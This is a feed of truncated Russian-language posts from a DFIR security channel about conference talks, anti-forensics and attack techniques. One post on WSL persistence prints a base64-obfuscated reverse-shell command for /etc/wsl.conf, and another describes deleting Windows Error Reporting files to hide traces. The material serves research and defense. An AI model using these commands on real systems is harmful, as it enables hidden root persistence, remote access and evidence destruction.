Garden Detective

#lolbas #anti_forensics #wer 🔵 Сегодня мы рассмотрим один из контр-криминалистических методов — использование нативной утилиты wermgr.exe ОС Windows для удаления WER-файлов. Данный исполняемый файл связан со службой Windows Error Reporting (WER), которая отвечает за сбор и отправку отладочной информации о сбоях как системных, так и сторонних приложений в Windows. Например, при падении приложения будет сгенерирован отчёт Report.wer. Он полезен DFIR-специалисту, поскольку содержит информацию о: �...

#cybercamp2025 #DFIR #task 🔵 Настало время опубликовать пост с веб-ссылками на доклады и разбором одного задания с CyberCamp 2025. Максимальная концентрация DFIR. 🍩 1️⃣ Доклад «Первое правило CI/CD-клуба: компрометация начинается с доверия». ️⃣Ссылка на презентацию; ️⃣Запись выступления. 2️⃣ Разбор задания «Горький коммит». ️⃣Ссылка на презентацию; ️⃣Запись эфира с разборами кейсов. P.S.: в разборе присутствуют 2 веб-ссылки на дополнительный материал: ➖подготовка к эмуляции атаки; ➖эмуляция де...

#offzone2025 🔵 Прошла очередная конференция — OFFZONE 2025. Поэтому самое время выложить презентации докладов, с которыми я выступал на данном мероприятии.🚪 1️⃣ На следующей неделе выложу дополнительный материал к докладу "Охота на призраков: изучение сетевой инфраструктуры атакующих" — полезные веб-ресурсы и ссылки, оформленные в Obsidian.🤪 2️⃣ Также позже залью на свой GitHub скрипты из второго доклада, связанного с GitLab.

#events 🔵 Уже почти конец года, но различных выступлений и активностей так и не убавилось.🚪 1️⃣Начнём с самого интересного — это CyberCamp 2025 (ну просто любимки). В первый день докладов кэмпа (21 октября) можно будет погрузиться в мир тайн компрометации. Поэтому рекомендую послушать эти три доклада. Также в данном году появился новый формат — консультации, где можно задать свои животрепещущие вопросы спикерам по различным темам. Если хочется обсудить Incident Response, Compromise Assessment ...

#persistence #t1037 #wsl 🔵 Копаясь в документации Microsoft по подсистеме WSL (Windows Subsystem for Linux), нашёл интересный механизм закрепления. В каждом инстансе можно создать файл /etc/wsl.conf и в секции [boot] указать для параметра command команду, которая будет выполняться с правами root при каждом его запуске. Пример содержимого файла /etc/wsl.conf (запуск обратной оболочки): [boot] command=echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM3LjEyOS8yMjIyIDA+JjE= | base64 -d | /bin/bash 🔴...

#uwp #DFIR #mfd2025 🔵 С 11 по 12 сентября проходила девятая ежегодная конференция — Moscow Forensics Day 2025. На данном мероприятии выступал с докладом на тему "UWP под прицелом DFIR: что скрывают современные Windows-приложения". Удалось осветить следующие пункты: 1️⃣ Что такое UWP (Universal Windows Platform) и MSIX-пакеты. 2️⃣ Инциденты ИБ, связанные с использованием MSIX-пакетов. 3️⃣ Криминалистические артефакты, возникающие при установке MSIX-пакета, и их источники. 4️⃣ Приложения из Micro...

#offzone2025 22 августа буду выступать на конференции OffZone 2025 с двумя докладами [🤪 которые я успешно доделал 🤪]. Буду рад видеть каждого, кто заглянет на мои выступления. Расписание: 1️⃣"Охота на призраков: изучение сетевой инфраструктуры атакующих". Трек: Threat.Zone. Время: 12:30-13:00. Описание. 2️⃣"Охота на тануки: узнаём точную версию GitLab". Трек: Fast Track. Время: 14:45–15:15. Описание.

#pentestaward2025 Вчера побывал на ежегодной независимой премии для пентестеров Pentest Award 2025, организованной компанией Awillix (@justsecurity). И да, ивент уже третий год стабильно набирает обороты. 🚪 Я был приятно удивлён, что смог занять второе место в номинации «РАЗ BYPASS, ДВА BYPASS", где в своей работе затронул такие темы, как: обход Sandbox, антифорензика и многое другое (да-да, об этом подробнее расскажу чуть позже). 💻 И отдельно хочется поблагодарить организаторов и жюри за боль...

#phishing #browser_cache 🔵 На конференции Insomnihack 2025 исследователь компании Orange Cyberdefense представил доклад, посвящённый способу доставки вредоносного ПО с использованием механизмов кэширования веб-браузеров (статья №1, статья №2). К данной работе хотелось бы добавить некоторое расширение, которое будет рассмотрено ниже. Но сначала кратко пройдёмся по основам. 🔵 Система кэширования веб-браузеров хранит следующие типы данных: 🔹HTML-файлы; 🔹CSS-файлы; 🔹JavaScript-файлы; 🔹медиафай...